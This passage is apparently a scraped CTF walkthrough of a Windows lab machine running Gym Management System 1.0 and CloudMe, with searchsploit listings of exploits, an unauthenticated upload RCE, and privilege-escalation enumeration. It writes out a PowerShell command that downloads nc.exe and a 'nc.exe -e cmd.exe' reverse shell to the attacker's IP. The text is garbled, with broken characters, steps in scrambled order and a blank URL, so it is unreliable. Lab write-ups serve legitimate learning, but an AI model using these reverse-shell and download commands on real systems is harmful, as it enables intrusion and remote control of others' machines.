![]() ┌──(root?kali)-ĬloudMe 1.11.2 - Buffer Overflow (PoC) | windows/remote/48389.pyĬloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR) | windows/local/48499.txtĬloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR) | windows/local/48840.pyĬloudme 1.9 - Buffer Overflow (DEP) (Metasploit) | windows_x86-64/remote/45197.rbĬloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass) | windows_x86-64/local/45159.pyĬloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit) | windows/remote/44175.rbĬloudMe Sync 1.11.0 - Local Buffer Overflow | windows/local/44470.pyĬloudMe Sync 1.11.2 - Buffer Overflow Egghunt | windows/remote/46218.pyĬloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass) | windows_x86-64/remote/46250.py Looking at searchsploit output we can see that there is a buffer overflow vulnerability in Cloudme 1.11.2. There was also an exe in Shauns download folder telling me what version of CloudMe is running.Ģ Dir(s) 7,133,970,432 bytes free Buffer overflow vulnerability ![]() Looking at the processes running I can see that CloudMe is running on the port 8888. Proto Local Address Foreign Address State PID Privilege Escalation EnumerationĪfter enumerating the machine I found that there was two ports listening on localhost. # Start listener and execute nc.exe reverse shellĬ:\xampp\htdocs\gym\upload> nc.exe -e cmd.exe 10.10.14.18 4444Ĭonnect to from (UNKNOWN) 50569 # Copy nc.exe to target machineĬ:\xampp\htdocs\gym\upload> powershell -c (New-Object Net.WebClient).DownloadFile('', 'nc.exe') The shell I got was very unstable, so I wanted to upgrade it. Support for it is now deprecated in cryptography, and will be removed in the next release. usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.p圓-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Shellcodes: No Results Initial Access Shell as shaun ┌──(root?kali). WordPress Plugin WPGYM - SQL Injection | php/webapps/42801.txt Gym Management System 1.0 - Unauthenticated Remote Code Execution | php/webapps/48506.py ![]() ![]() Gym Management System 1.0 - Stored Cross Site Scripting | php/webapps/48941.txt Gym Management System 1.0 - Authentication Bypass | php/webapps/48940.txt Gym Management System 1.0 - 'id' SQL Injection | php/webapps/48936.txt Gym Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters. In the Contact directory we can see a note that says Made using Gym Management Software 1.0.Ī quick look at searchploit reveals that there is a RCE vulnerability in this software.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |